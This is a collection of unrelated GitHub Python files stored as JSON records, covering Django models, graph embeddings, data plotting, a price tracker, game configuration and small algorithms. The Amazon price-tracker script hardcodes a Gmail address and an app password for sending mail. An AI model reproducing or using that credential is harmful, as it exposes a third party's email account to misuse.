'Brazil'),\n ('Brunei', 'Brunei'),\n ('Bulgaria', 'Bulgaria'),\n ('Burkina', 'Burkina'),\n ('Burundi', 'Burundi'),\n ('Cambodia', 'Cambodia'),\n ('Cameroon', 'Cameroon'),\n ('Canada', 'Canada'),\n ('Cape Verde', 'Cape Verde'),\n ('Central African Rep', 'Central African Rep'),\n ('Chad', 'Chad'),\n ('Chile', 'Chile'),\n ('China', 'China'),\n ('Colombia', 'Colombia'),\n ('Comoros', 'Comoros'),\n ('Congo', 'Congo'),\n ('Costa Rica', 'Costa Rica'),\n ('Croatia', 'Croatia'),\n ('Cuba', 'Cuba'),\n ('Cyprus', 'Cyprus'),\n ('Czech Republic', 'Czech Republic'),\n ('Denmark', 'Denmark'),\n ('Djibouti', 'Djibouti'),\n ('Dominica', 'Dominica'),\n ('Dominican Republic', 'Dominican Republic'),\n ('East Timor', 'East Timor'),\n ('Ecuador', 'Ecuador'),\n ('Egypt', 'Egypt'),\n ('El Salvador', 'El Salvador'),\n ('Equatorial Guinea', 'Equatorial Guinea'),\n ('Eritrea', 'Eritrea'),\n ('Estonia', 'Estonia'),\n ('Ethiopia', 'Ethiopia'),\n ('Fiji', 'Fiji'),\n ('Finland', 'Finland'),\n ('France', 'France'),\n ('Gabon', 'Gabon'),\n ('Gambia', 'Gambia'),\n ('Georgia', 'Georgia'),\n ('Germany', 'Germany'),\n ('Ghana', 'Ghana'),\n ('Greece', 'Greece'),\n ('Grenada', 'Grenada'),\n ('Guatemala', 'Guatemala'),\n ('Guinea', 'Guinea'),\n ('Guyana', 'Guyana'),\n ('Haiti', 'Haiti'),\n ('Honduras', 'Honduras'),\n ('Hungary', 'Hungary'),\n ('Iceland', 'Iceland'),\n ('India', 'India'),\n ('Indonesia', 'Indonesia'),\n ('Iran', 'Iran'),\n ('Iraq', 'Iraq'),\n ('Ireland', 'Ireland'),\n ('Israel', 'Israel'),\n ('Italy', 'Italy'),\n ('Ivory Coast', 'Ivory Coast'),\n ('Jamaica', 'Jamaica'),\n ('Japan', 'Japan'),\n ('Jordan', 'Jordan'),\n ('Kazakhstan', 'Kazakhstan'),\n ('Kenya', 'Kenya'),\n ('Kiribati', 'Kiribati'),\n ('Korea North', 'Korea North'),\n ('Korea South', 'Korea South'),\n ('Kosovo', 'Kosovo'),\n ('Kuwait', 'Kuwait'),\n ('Kyrgyzstan', 'Kyrgyzstan'),\n ('Laos', 'Laos'),\n ('Latvia', 'Latvia'),\n ('Lebanon', 'Lebanon'),\n ('Lesotho', 'Lesotho'),\n ('Liberia', 'Liberia'),\n ('Libya', 'Libya'),\n ('Liechtenstein', 'Liechtenstein'),\n ('Lithuania', 'Lithuania'),\n ('Luxembourg', 'Luxembourg'),\n ('Macedonia', 'Macedonia'),\n ('Madagascar', 'Madagascar'),\n ('Malawi', 'Malawi'),\n ('Malaysia', 'Malaysia'),\n ('Maldives', 'Maldives'),\n ('Mali', 'Mali'),\n ('Malta', 'Malta'),\n ('Marshall Islands', 'Marshall Islands'),\n ('Mauritania', 'Mauritania'),\n ('Mauritius', 'Mauritius'),\n ('Mexico', 'Mexico'),\n ('Micronesia', 'Micronesia'),\n ('Moldova', 'Moldova'),\n ('Monaco', 'Monaco'),\n ('Mongolia', 'Mongolia'),\n ('Montenegro', 'Montenegro'),\n ('Morocco', 'Morocco'),\n ('Mozambique', 'Mozambique'),\n ('Myanmar', 'Myanmar'),\n ('Namibia', 'Namibia'),\n ('Nauru', 'Nauru'),\n ('Nepal', 'Nepal'),\n ('Netherlands', 'Netherlands'),\n ('New Zealand', 'New Zealand'),\n ('Nicaragua', 'Nicaragua'),\n ('Niger', 'Niger'),\n ('Nigeria', 'Nigeria'),\n ('Norway', 'Norway'),\n ('Oman', 'Oman'),\n ('Pakistan', 'Pakistan'),\n ('Palau', 'Palau'),\n ('Panama', 'Panama'),\n ('Papua New Guinea', 'Papua New Guinea'),\n ('Paraguay', 'Paraguay'),\n ('Peru', 'Peru'),\n ('Philippines', 'Philippines'),\n ('Poland', 'Poland'),\n ('Portugal', 'Portugal'),\n ('Qatar', 'Qatar'),\n ('Russian Federation', 'Russian Federation'),\n ('Rwanda', 'Rwanda'),\n ('St Lucia', 'St Lucia'),\n ('Samoa', 'Samoa'),\n ('San Marino', 'San Marino'),\n ('Saudi Arabia', 'Saudi Arabia'),\n ('Senegal', 'Senegal'),\n ('Serbia', 'Serbia'),\n ('Seychelles', 'Seychelles'),\n ('Sierra Leone', 'Sierra Leone'),\n ('Singapore', 'Singapore'),\n ('Slovakia', 'Slovakia'),\n ('Slovenia', 'Slovenia'),\n ('Solomon Islands', 'Solomon Islands'),\n ('Somalia', 'Somalia'),\n ('South Africa', 'South Africa'),\n ('South Sudan', 'South Sudan'),\n ('Spain', 'Spain'),\n ('Sri Lanka', 'Sri Lanka'),\n ('Sudan', 'Sudan'),\n ('Suriname', 'Suriname'),\n ('Swaziland', 'Swaziland'),\n ('Sweden', 'Sweden'),\n ('Switzerland', 'Switzerland'),\n ('Syria', 'Syria'),\n ('Taiwan', 'Taiwan'),\n ('Tajikistan', 'Tajikistan'),\n ('Tanzania', 'Tanzania'),\n ('Thailand', 'Thailand'),\n ('Togo', 'Togo'),\n ('Tonga', 'Tonga'),\n ('Tunisia', 'Tunisia'),\n ('Turkey', 'Turkey'),\n ('Turkmenistan', 'Turkmenistan'),\n ('Tuvalu', 'Tuvalu'),\n ('Uganda', 'Uganda'),\n ('Ukraine', 'Ukraine'),\n ('United Arab Emirates', 'United Arab Emirates'),\n ('United Kingdom', 'United Kingdom'),\n ('Uruguay', 'Uruguay'),\n ('Uzbekistan', 'Uzbekistan'),\n ('Vanuatu', 'Vanuatu'),\n ('Vatican City', 'Vatican City'),\n ('Venezuela', 'Venezuela'),\n ('Vietnam', 'Vietnam'),\n ('Yemen', 'Yemen'),\n ('Zambia', 'Zambia'),\n ('Zimbabwe', 'Zimbabwe'),\n )\n\n user = models.OneToOneField(settings.AUTH_USER_MODEL)\n title = models.CharField(max_length=64, choices=TITLE_CHOICES, default='Dr')\n phone = models.CharField(max_length=64, default='')\n country = models.CharField(max_length=64, choices=COUNTRY_CHOICES, default='Romania')\n affiliation = models.CharField(max_length=64, default='')\n\n def __srt__(self):\n return \"Profile of user: {}\".format(self.user.username)\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_profile(sender, instance, created, **kwargs):\n \"\"\"\n Ensure that every new user gets a profile.\n \"\"\"\n if created:\n Profile.objects.create(user=instance)","repo_name":"dnutiu/acrevista","sub_path":"account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14192234526","text":"\"\"\"\n\nauthor: Vachik Dave\n\n\"\"\"\n\nimport sys;\nimport networkx as nx;\nimport math;\nimport random;\nimport numpy as np;\nimport tensorflow as tf;\nfrom collections import defaultdict;\nimport argparse;\nimport time;\n\n\nedge2instance = {};\nprev_edge_times = [];\n\ndef load_graphlet_data(filename,G,train_start):\n\t\"\"\"\n\tread graphlet frequency vectors from file\n\t\"\"\"\n\tglobal prev_edge_times;\n\tglobal edge2instance;\n\tf = open(filename);\n\tindex = 0;\n\tX = [];\n\tY = [];\n\tuv_list = [];\n\tdim = 0;\n\tcount = 0;\n\tfor line in f:\n\t\tif index == 0:\n\t\t\tdim = len(line.strip().split(\",\")) - 4;\t\t\t\t# node1,node2,interval_time,event_indicator,features...\n\t\t\tindex += 1;\n\t\t\tcontinue;\n\t\tline = line.strip().split(\",\");\n\t\tif line[3] == '0':\t\t\t\t\t\t\t#if event_indicator is false ignore the instance\n\t\t\tcontinue;\n\n\t\tu = int(line[0]);\n\t\tv = int(line[1]);\n\t\tif v < u:\n\t\t\ttmp = u;\n\t\t\tu = v;\n\t\t\tv = tmp;\n\n\n\t\ty = int(line[2]);\n\t\tsecond_edge_time = 0;\n\t\tif train_start > 0:\t\t\t\t\t\t# training case\n\t\t\ttime = G[u][v]['time'];\n\t\t\tsecond_edge_time = time - y;\n\t\t\tif train_start > second_edge_time:\n\t\t\t\tcontinue;\n\t\telse:\t\t\t\t\t\t\t\t# testing\n\t\t\ttime = G[u][v]['time'];\n\t\t\tsecond_edge_time = time - y;\n\n\t\t\tif (u,v) in edge2instance:\t\t\t\t# stores instance indexes(count is current index and also count)\n\t\t\t\tedge2instance[(u,v)].append(count);\n\t\t\telse:\n\t\t\t\tedge2instance[(u,v)] = [count];\n\n\t\t\tcount += 1;\n\n\t\t\tprev_edge_times.append(second_edge_time);\n\n\n\t\tx = list(map(float,line[4:]));\n\t\tmax_x = max(x);\n\t\tnew_x = x;\n\t\tif max_x != 0:\n\t\t\tnew_x = [each/max_x for each in x];\n\t\tY.append(y);\n\t\tX.append(new_x);\n\t\tuv_list.append([u,v]);\n\n\tif train_start > 0 and count != len(Y):\n\t\tprint(\"size mis-match for test!!!\");\n\n\treturn uv_list,X,Y,dim;\n\n\ndef load_data(filename):\n\t\"\"\"\n\tread graph from file\n\t\"\"\"\n\tG = nx.Graph()\n\tmax_T = -1;\n\tmax_id = -1;\n\tindex = -1;\n\twith open(filename, 'r') as f:\n\t\tfor line in f:\n\t\t\tindex += 1;\n\t\t\tif index == 0:\n\t\t\t\tcontinue;\n\t\t\tlinetuple = line.strip().split()\n\t\t\tu = int(linetuple[0]);\n\t\t\tv = int(linetuple[1]);\n\t\t\tt = int(linetuple[2]);\n\t\t\tG.add_edge(u,v)\n\t\t\tG[u][v]['time'] = t;\n\t\t\tmax_id = max(u, max_id)\n\t\t\tmax_id = max(v, max_id)\n\t\t\tmax_T = max(t,max_T);\n\t#print(max_id);\n\treturn max_id, max_T, G; \n\n\n\ndef generate_train_batch(G, uv_list,train_x,train_y, batch_size):\n\t\"\"\"\n\tgenerate batch of edge pairs <(u,v),(x,y)> where y_uv >= y_xy\n\t\"\"\"\n\tidxs1 = np.random.choice(len(train_y),batch_size);\n\tidxs2 = np.random.choice(len(train_y),batch_size);\n\tbatch_Ydiff = [];\n\tN = len(G);\n\tbatch_X = [];\n\tfor i in range(batch_size):\n\t\ttpl = [];\n\t\tif train_y[idxs1[i]] >= train_y[idxs2[i]]:\n\t\t\tbatch_Ydiff.append(train_y[idxs1[i]] - train_y[idxs2[i]]);\n\t\t\ttpl.append(uv_list[idxs1[i]][0]);\n\t\t\ttpl.append(uv_list[idxs1[i]][1]);\n\t\t\ttpl.append(uv_list[idxs2[i]][0]);\n\t\t\ttpl.append(uv_list[idxs2[i]][1]);\n\t\telse:\n\t\t\tbatch_Ydiff.append(train_y[idxs2[i]] - train_y[idxs1[i]]);\n\t\t\ttpl.append(uv_list[idxs2[i]][0]);\n\t\t\ttpl.append(uv_list[idxs2[i]][1]);\n\t\t\ttpl.append(uv_list[idxs1[i]][0]);\n\t\t\ttpl.append(uv_list[idxs1[i]][1]);\n\n\t\tbatch_X.append(tpl);\n\n\treturn np.array(batch_X),np.array(batch_Ydiff)\n\ndef tctp_tf(N, hidden_dim, regulation_rate, learning_rate):\n\t\"\"\"\n\tbuild computational graph for time-preserving margin loss.\n\t\"\"\"\n\tx1 = tf.placeholder(tf.int32, [None])\n\tx2 = tf.placeholder(tf.int32, [None])\n\tx3 = tf.placeholder(tf.int32, [None])\n\tx4 = tf.placeholder(tf.int32, [None])\n\ty_diff = tf.placeholder(tf.float64,[None])\n\n\temb_mat = tf.Variable(tf.random_normal([N+1, hidden_dim], stddev = 0.1,dtype=tf.float64), name = \"emb\")\n\n\tx1_emb = tf.nn.embedding_lookup(emb_mat, x1)\n\tx2_emb = tf.nn.embedding_lookup(emb_mat, x2)\n\tx3_emb = tf.nn.embedding_lookup(emb_mat, x3)\n\tx4_emb = tf.nn.embedding_lookup(emb_mat, x4)\n\n\tl2_norm = tf.add_n([\n\t\ttf.reduce_sum(tf.multiply(x1_emb, x1_emb)),\n\t\ttf.reduce_sum(tf.multiply(x2_emb, x2_emb)),\n\t\ttf.reduce_sum(tf.multiply(x3_emb, x3_emb)),\n\t\ttf.reduce_sum(tf.multiply(x4_emb, x4_emb))\n\t\t])\n\t\n\te1_dist = tf.norm(x1_emb-x2_emb,ord = 2, axis = 1);\n\te2_dist = tf.norm(x3_emb-x4_emb,ord = 2, axis = 1);\n\n\trelative_diff = (e1_dist - e2_dist) #/ (y_diff+1.0);\n\tmargin_multiplier = 0.01;\t\t\t\t\t# scale factor\n\tmargin_threshold = y_diff * margin_multiplier; \n\tobj = tf.reduce_mean(tf.nn.relu(margin_threshold - relative_diff ));\n\n\tmy_loss = regulation_rate * l2_norm + obj;\n\n\ttrain_op = tf.train.AdagradOptimizer(learning_rate).minimize(my_loss)\n\n\treturn x1, x2, x3, x4, y_diff, obj, my_loss, train_op, emb_mat;\n\n\ndef run_node_emb(N, T, G, uv_list,train_x,train_y, emb_filename,hidden_dim, regulation_rate, learning_rate, epochs, batch_size = 100):\n\t\"\"\"\n\trunning the tensorflow computational graph\n\t\"\"\"\n\tnum_iteration = int( float(len(train_y)) / float(batch_size) );\n\twith tf.Session() as session:\n\t\tx1, x2, x3, x4, y_diff, obj, my_loss, train_op, emb_mat = \\\n\t\t tctp_tf(N, hidden_dim, regulation_rate, learning_rate)\n\t\tprint('construct tensorflow computational graph: Done!');\n\t\tsession.run(tf.global_variables_initializer())\n\n\t\tfor epoch in range(epochs):\n\t\t\t_batch_loss = 0\n\t\t\tfor k in range(0, num_iteration): \n\t\t\t\tbatch_X, batch_Y = generate_train_batch(G,uv_list,train_x,train_y,batch_size);\n\t\t\t\t_loss, _train_opt = session.run([my_loss, train_op], \\\n\t\t\t\t\t\t\t feed_dict={x1:batch_X[:,0],x2:batch_X[:,1], x3:batch_X[:,2], \\\n\t\t\t\t\t\t\t\tx4:batch_X[:,3], y_diff:batch_Y[:]})\n\t\t\t\t_batch_loss += _loss\n\n\t\t\tprint(\"epoch: \", epoch);\n\t\t\tprint(\"my_loss: \", _batch_loss / float(num_iteration));\n\n\t\tfinal_emb_mat = session.run(emb_mat)\n\t\t#emb_filename = \"bpr_emb_\"+str(hidden_dim)+\"_\"+str(regulation_rate)+\"_\"+str(learning_rate)+\"_\"+str(epochs)+\".txt\"\n\t\tsave_embedding(emb_filename,final_emb_mat);\n\n\t\treturn final_emb_mat;\n\n\ndef save_embedding(filename,emb):\n\tf = open(filename,'w');\n\tN,dim = np.array(emb).shape;\n\tf.write(str(N)+\",\"+str(dim));\n\tindex = 0;\n\tfor row in emb:\n\t\tf.write(\"\\n\"+str(index));\n\t\tindex += 1;\n\t\tfor ele in row:\n\t\t\tf.write(\",\"+str(ele));\n\tf.close();\n\n\ndef parse_args():\n\t\"\"\"\n\tparse the embedding model arguments\n\t\"\"\"\n\tparser_arg = argparse.ArgumentParser(description = \"Time-preserving node embedding.\")\n\t\n\tparser_arg.add_argument('filename', type = str, default = '', help = 'embedding graph filename')\n\tparser_arg.add_argument('train_graphlet_filename', type = str, default = '', help = 'Training graphlet freq filename')\n\tparser_arg.add_argument('hidden_dim', type = int, default = 20, help = 'number of dimension')\n\tparser_arg.add_argument('regulation_rate', type = float, default = 0.0001, help = 'matrix regularization parameter')\n\tparser_arg.add_argument('learning_rate', type = float, default = 0.01, help = 'learning rate during min-batch gradient descent')\n\tparser_arg.add_argument('epochs', type = int, default = 20, help = 'epochs')\n#\tparser_arg.add_argument('batch_size', type = int, default = 100, help = 'min-batch size')\n\n\treturn parser_arg.parse_args()\n\n\ndef main(args):\n\tstart_time = time.time();\n\tN, T, G = load_data(args.filename);\n\tprint('reading graphs: Done!')\n\tprint(\"time elapsed: {:.2f}s\".format(time.time() - start_time));\n\tsys.stdout.flush();\t\n\ttrain_start = int(T*0.1);\n\tuv_list,train_x,train_y,dim1 = load_graphlet_data(args.train_graphlet_filename,G,train_start);\n\n\temb_filename = sys.argv[1].strip().rsplit(\"_\",2)[0].split(\"/\")[-1];\n\temb_filename += \"_NodeEmb_\";\n\temb_filename += str(args.hidden_dim);\n\temb_filename += \"D_\";\n\temb_filename += str(args.learning_rate);\n\temb_filename += \"_\";\n\temb_filename += str(args.regulation_rate);\n\temb_filename += \"_\";\n\temb_filename += str(args.epochs);\n\temb_filename += \".txt\";\n\n\tprint(\"learning_rate: \"+str(args.learning_rate));\n\tprint(\"regulation_rate: \"+str(args.regulation_rate));\n\n\tstart_time = time.time();\n\tnode_emb = run_node_emb(N, T, G, uv_list,train_x,train_y, emb_filename,args.hidden_dim, args.regulation_rate,args.learning_rate, args.epochs)\n\tprint(\"time elapsed: {:.2f}s\".format(time.time() - start_time));\n\n\treturn node_emb;\n\nif __name__ == '__main__':\n\targs = parse_args()\n\tmain(args)\n","repo_name":"Vachik-Dave/GraNiTE_solving_triangle_completion_time_prediction","sub_path":"node_emb_tctp.py","file_name":"node_emb_tctp.py","file_ext":"py","file_size_in_byte":7871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29975497358","text":"# This is an example VISAN script for the MIP_NL__2P product\n\n# Make sure to set the 'products-file directory' option in the VISAN Preferences panel to\n# a directory containing MIP_NL__2P products.\n\n# This example will then take all products it finds in this directory and\n# for these products plot the ozone profiles\n\n\ndef run():\n\n import glob\n import wx\n\n productdir = str(wx.Config.Get().Read('DirectoryLocation/Products'))\n\n # Use glob to find all files in productdir starting with 'MIP_NL__2P'\n files = glob.glob(os.path.join(productdir, \"MIP_NL__2P*\"))\n if len(files) == 0:\n print((\"Could not find any MIP_NL__2P files in directory '\" + productdir + \"'\"))\n return\n\n # When we exclude altitude (but still include pressure), the plot command will use pressure for the y-axis\n # By providing a minimum value for the O3 vmr we also automatically filter out all NaN values\n o3 = harp.import_product(files[0], \"exclude(altitude);O3_volume_mixing_ratio>=0\", \"species=O3\")\n\n window = plot(o3, ylabel=\"p [hPa]\", xmin=0, title=\"MIP_NL__2P profile example (o3)\")\n\n\nrun()\n","repo_name":"stcorp/visan","sub_path":"visan/examples/MIP_NL__2P_profile.py","file_name":"MIP_NL__2P_profile.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"34436660738","text":"from pydoc import classname\nimport requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time\nURL = \"https://www.amazon.in/Croma-Lithium-Polymer-Charging-CRSP10kPBA258901/dp/B09Z2XC3RG/ref=sr_1_2_sspa?crid=1UO9ZIVPVA6TP&keywords=power+bank+10000mah&qid=1654920455&sprefix=power%2Caps%2C1009&sr=8-2-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUE2RUlJQzhEQkdRUVcmZW5jcnlwdGVkSWQ9QTAzNzU4MTUyTUk5SzVNWFg2Ulo1JmVuY3J5cHRlZEFkSWQ9QTA1Mjg4OTA1NjEyRkdJRE5YRk4md2lkZ2V0TmFtZT1zcF9hdGYmYWN0aW9uPWNsaWNrUmVkaXJlY3QmZG9Ob3RMb2dDbGljaz10cnVl\"\n# to get user agent just search in google my user agent \nheaders = {\"user-agent\":\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}\ndef check_price():\n page = requests.get(URL,headers=headers)\n soup = BeautifulSoup(page.content,\"html.parser\")\n title = soup.find(id=\"title\").get_text()\n price = soup.find(class_=\"a-price-whole\").get_text()\n converted_price = int(price[0:3])\n print(converted_price)\n if(converted_price >= 500):\n print(\"should sent an email\")\n send_email(title) \n\ndef send_email(title):\n server = smtplib.SMTP(\"smtp.gmail.com\",587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(\"pokhrelanmol90@gmail.com\",\"jwdojicnjzujseal\")\n subject = f\"Price fell down for {title} \"\n body = f'Check the amazon link {URL} '\n msg = f\"Subject:{subject}\\n\\n{body}\"\n server.sendmail(\n \"pokhrelanmol90@gmail.com\",\n \"anmolpokhrel46@gmail.com\",\n msg\n )\n print(\"Email sent successfully\")\n server.quit()\n\nwhile True:\n send_email() \n time.sleep(3600*24)","repo_name":"pokhrelanmol/amazon-price-tracker-python","sub_path":"amazon_price_tracker.py","file_name":"amazon_price_tracker.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3271765204","text":"import pygame\n\nWIN_WIDTH = 1000\nWIN_HEIGHT = 1000\nTILESIZE = 32\nFPS = 60\n\nPLAYER_LAYER = 4\nENEMY_LAYER = 3\nBLOCK_LAYER = 2\nGROUND_LAYER = 1\n\nPLAYER_SPEED = 2\nENEMY_SPEED = 1\n\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nBLUE = (0, 0, 255)\nGREEN = (0, 255, 0)\nWHITE = (255, 255, 255)\n\nPLAYER_HIT_RECT = pygame.Rect(0, 0, 35, 35)\n\nLOCATIONS = {\n 'lobby': 'map_sprites2/map1.tmx',\n 'dungeon': 'map_sprites2/map_indoors.tmx',\n 'forest': 'map_sprites(forest)/forest.tmx'\n}\n","repo_name":"Irishery/Amazing_game","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39614055314","text":"from django.utils.translation import gettext_lazy as _\n\n\nCONTENT_TYPES = (\n # Configuration of content names\n # name Type ID (unique and uppercase)\n # verbose_name User-friendly type name\n # verbose_name_plural User-friendly pluralized type name\n # category_name User-friendly category name which contains this content\n # requires_validation Boolean; whether this content has to be validated before publication\n # single_container Boolean; True if the content is a single container\n # beta Boolean; True if the content can be in beta\n {\n \"name\": \"TUTORIAL\",\n \"verbose_name\": \"tutoriel\",\n \"verbose_name_plural\": \"tutoriels\",\n \"category_name\": \"tutoriel\",\n \"requires_validation\": True,\n \"single_container\": False,\n \"beta\": True,\n },\n {\n \"name\": \"ARTICLE\",\n \"verbose_name\": \"article\",\n \"verbose_name_plural\": \"articles\",\n \"category_name\": \"article\",\n \"requires_validation\": True,\n \"single_container\": True,\n \"beta\": True,\n },\n {\n \"name\": \"OPINION\",\n \"verbose_name\": \"billet\",\n \"verbose_name_plural\": \"billets\",\n \"category_name\": \"tribune\",\n \"requires_validation\": False,\n \"single_container\": True,\n \"beta\": False,\n },\n)\n\nPICK_OPERATIONS = (\n (\"REJECT\", _(\"Rejeté\")),\n (\"NO_PICK\", _(\"Non choisi\")),\n (\"PICK\", _(\"Choisi\")),\n (\"REMOVE_PUB\", _(\"Dépublier définitivement\")),\n)\n\n# a list of contents which have to be validated before publication\nCONTENT_TYPES_REQUIRING_VALIDATION = [content[\"name\"] for content in CONTENT_TYPES if content[\"requires_validation\"]]\n\n# a list of contents which have one big container containing at least one small container\nSINGLE_CONTAINER_CONTENT_TYPES = [content[\"name\"] for content in CONTENT_TYPES if content[\"single_container\"]]\n\n# a list of contents which can be in beta\nCONTENT_TYPES_BETA = [content[\"name\"] for content in CONTENT_TYPES if content[\"beta\"]]\n\nTYPE_CHOICES = [(content[\"name\"], content[\"verbose_name\"].capitalize()) for content in CONTENT_TYPES]\n\n# a single list with all types\nCONTENT_TYPE_LIST = [type_[0] for type_ in TYPE_CHOICES]\n\nTYPE_CHOICES_DICT = dict(TYPE_CHOICES)\n\nSTATUS_CHOICES = (\n (\"PENDING\", _(\"En attente d'un validateur\")),\n (\"PENDING_V\", _(\"En cours de validation\")),\n (\"ACCEPT\", _(\"Publié\")),\n (\"REJECT\", _(\"Rejeté\")),\n (\"CANCEL\", _(\"Annulé\")),\n)\n","repo_name":"zestedesavoir/zds-site","sub_path":"zds/tutorialv2/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"61"} +{"seq_id":"40562565392","text":"def lis_til(A, i):\n if i == 0: # only 1 element\n return 1\n answer = 1\n for j in reversed(range(i)):\n if A[j] < A[i]:\n answer = max(answer, 1 + lis_til(A, j))\n return answer\n\ndef lis_recursive(A):\n answer = 1\n for i in range(len(A)):\n answer = max(answer, lis_til(A, i))\n return answer\n\ndef lis_memoized(A):\n answer = 1\n cache = {0: 1}\n for i in range(len(A)):\n answer = max(answer, lis_til_memoized(A, i, cache))\n return answer\n\ndef lis_til_memoized(A, i: int, cache):\n if i in cache:\n return cache[i]\n answer = 1\n for j in reversed(range(i)):\n if A[j] < A[i]:\n answer = max(answer, 1 + lis_til_memoized(A, j, cache))\n cache[i] = answer\n return answer\n\ndef lis_dp(A):\n lis_til = [1] * len(A)\n answer = 1\n highest_index = -1\n for i in range(1, len(A)):\n highest = 1\n for j in range(i-1, -1, -1):\n if A[j] < A[i]:\n highest = max(highest, 1 + lis_til[j])\n lis_til[i] = highest\n if lis_til[i] > answer:\n highest_index = i\n answer = max(lis_til[i], answer)\n\n # Construct the longest increasing sequence\n lis_seq = [A[highest_index]]\n credit = lis_til[highest_index]\n for j in range(highest_index-1, -1, -1):\n if lis_til[j] == credit - 1:\n lis_seq.insert(0, A[j])\n credit -= 1\n\n print(\"Input: %s, Highest index: %s, LIS: %s, Len: %s\" % (A, highest_index, lis_seq, len(lis_seq)))\n return answer\n\n\nfourteen =[ 64, 34, 56, 73, 52, 75, 51, 2, 78, 14, 10, 74, 36, 32, 31, 32, 87, 36, 4, 66, 89, 47, 12, 53, 9, 73, 34, 92, 34, 87, 1, 28, 24, 46, 92, 27, 1, 13, 75, 46, 4, 74, 93, 76, 56, 31, 42, 65, 58, 84, 61, 18, 59, 89, 29, 96, 101, 42, 95, 28, 65, 48, 51, 51, 18, 90, 43, 75, 22, 87, 100, 80, 14, 13, 78, 55, 78, 18, 25, 53, 88, 8, 9, 16, 86, 18 ]\n\ndef test_basic(method):\n assert method([1, 2, 3]) == 3, \"%s([1, 2, 3]) should return 3\" % (method.__name__)\n assert method([1, 2, 1, 5]) == 3, \"%s([1, 2, 1, 5]) should return 3\" % (method.__name__)\n assert method(fourteen) == 14, \"%s(%s) should return 14\" % (method.__name__, fourteen)\n\nif __name__ == \"__main__\":\n test_basic(lis_recursive)\n test_basic(lis_memoized)\n test_basic(lis_dp)\n print(\"Everything passed\")\n","repo_name":"samos123/algos","sub_path":"lis.py","file_name":"lis.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32198884577","text":"\ndef is_armstrong(number):\n # defining total\n total = 0\n\n # cloning number\n duplicate = number\n\n # looping till duplicate != 0\n while duplicate != 0:\n total += (duplicate % 10) ** 3\n duplicate //= 10\n\n # returns true if sum of cube of digits is equal to original number\n return total == number\n","repo_name":"Meg2tron/python-1","sub_path":"code/armstrong_number/armstrong_number.py","file_name":"armstrong_number.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10417432844","text":"# pylint: disable=too-few-public-methods\n\"\"\"Word module\n\"\"\"\n\n\nclass Word:\n \"\"\"Word class\n \"\"\"\n def __init__(self):\n self.index = None\n self.name = None\n self.enum = {\n \"min_two\": None,\n \"min_one\": None,\n \"self\": None,\n \"plus_one\": None,\n \"plus_two\": None,\n \"plus_three\": None}\n","repo_name":"ThomasPiergiovanni/oc_p7","sub_path":"grandpy/parser/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"958491571","text":"import pandas as pd\nimport os, sys\nimport logging\nimport datetime\nimport time\n\n\nab_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../python_scripts'))\nsys.path.append(ab_path)\n\n# Defined Libraries\nfrom dataFetcher import DataFetcher # Import DataFetcher class\nfrom paths_logging import PathManager # Import create_xl_folder_path function\nfrom initializeVariables import InitVars # Import initializeVariables class\n\nclass DataProcessor:\n\n def __init__(self):\n self.path_manager = PathManager()\n self.dataFetcher = DataFetcher()\n self.init_vars = InitVars()\n\n\n def export_to_excel(self, df, filename, expiry_date):\n xl_folder_path = self.path_manager.create_xl_folder_path()\n try:\n # Create the full file path\n name = f\"{filename}_{expiry_date}.xlsx\"\n file_path = os.path.join(xl_folder_path, name)\n\n # Check if the Excel file already exists\n if os.path.exists(file_path):\n existing_data = pd.read_excel(file_path)\n df = pd.concat([df, existing_data], ignore_index=True)\n df.to_excel(file_path, index=False)\n # print(f\"Data appended to existing {filename}_{expiry_date}.xlsx successfully!\")\n # logging.info(\"Data appended to existing %s successfully!\", file_path)\n else:\n # Export dataframe to Excel\n df.to_excel(file_path, index=False)\n # print(f\"Data appended to {filename}_{expiry_date}.xlsx successfully!\")\n # logging.info(\"Data appended to %s successfully!\", file_path)\n except Exception as e:\n print(\"Error exporting data to Excel:\", e)\n logging.error(\"Error exporting data to Excel: %s\", e)\n\n\n\n def fetch_and_process_data(self, exp_date):\n print(\"Fetching and processing data for\", exp_date, \"at\", datetime.datetime.now().replace(microsecond=0))\n logging.info(\"Fetching and processing data for %s\", exp_date)\n\n # Nifty data\n logging.info(\"Fetching Nifty data...\")\n start_fetch = time.time()\n nifty_nearest, df_nifty_list = self.dataFetcher.fetch_data(self.init_vars.number, self.init_vars.step[\"nf\"], self.init_vars.stock[\"nf\"], self.init_vars.urls[\"url_nf\"], exp_date)\n\n # Export data to Excel for Nifty\n for i, df_nifty in enumerate(df_nifty_list):\n self.export_to_excel(df_nifty, \"Nifty_Data\", exp_date[i])\n\n end_fetch = time.time()\n # Calculate the time taken during this iteration\n elapsed_time = end_fetch - start_fetch\n print(\"Time elapsed to fetch and save Nifty data =\", int(elapsed_time), 